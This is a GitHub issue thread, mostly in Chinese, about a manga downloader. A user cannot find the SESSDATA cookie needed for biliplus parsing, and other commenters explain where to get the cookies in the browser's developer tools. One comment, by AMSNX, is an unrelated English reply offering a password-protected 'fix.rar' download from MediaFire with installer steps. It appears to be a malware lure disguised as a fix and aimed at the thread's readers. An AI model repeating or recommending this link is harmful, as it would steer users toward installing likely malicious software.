### ISSUE TITLE
无法正常添加biliplus的cookies

### ISSUE THREAD

**Issue by Jangkoole** [Zeal-L/BiliBili-Manga-Downloader#164]
### 问题描述

按照README文档中所说，在ComicWebViewer中登录好账号按F12按 应用-cookie-点击https://manga.bilibili.com 操作后，在表格中没有SESSDATA栏目，使用的浏览器是edge，希望解决
![屏幕截图 2024-08-26 222301](https://github.com/user-attachments/assets/669fcf85-37af-4c9c-975c-dc36fffac3f9)

### 预期行为

正常情况下应该有该选项

### 实际行为

没有该选项因此无法正确使用biliplus解析

### 哔哩哔哩漫画下载器版本号

v1.5.1

### 系统环境

Windows11

### 日志

[Uploading ERROR.log…]()

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kotorimiku** [comment]
现在需要所有cookies，可以在这获取。
![image](https://github.com/user-attachments/assets/97a718f1-016f-47e6-aaf3-810ee5c79b6b)

**Comment by c870620096** [comment]
![image](https://github.com/user-attachments/assets/fb74c644-8b58-4988-a453-c3714a676ad4)
为什么这里没有cookie

**Comment by kotorimiku** [comment]
左边带齿轮的有cookie。

![image](https://github.com/user-attachments/assets/26237f1b-4dc7-43a7-aed6-d1d6a0157a90)

不行，就先关闭启用缓存，再刷新一遍。

![image](https://github.com/user-attachments/assets/659ddf8c-ff0b-4e01-879f-dd0abe8aa6c1)
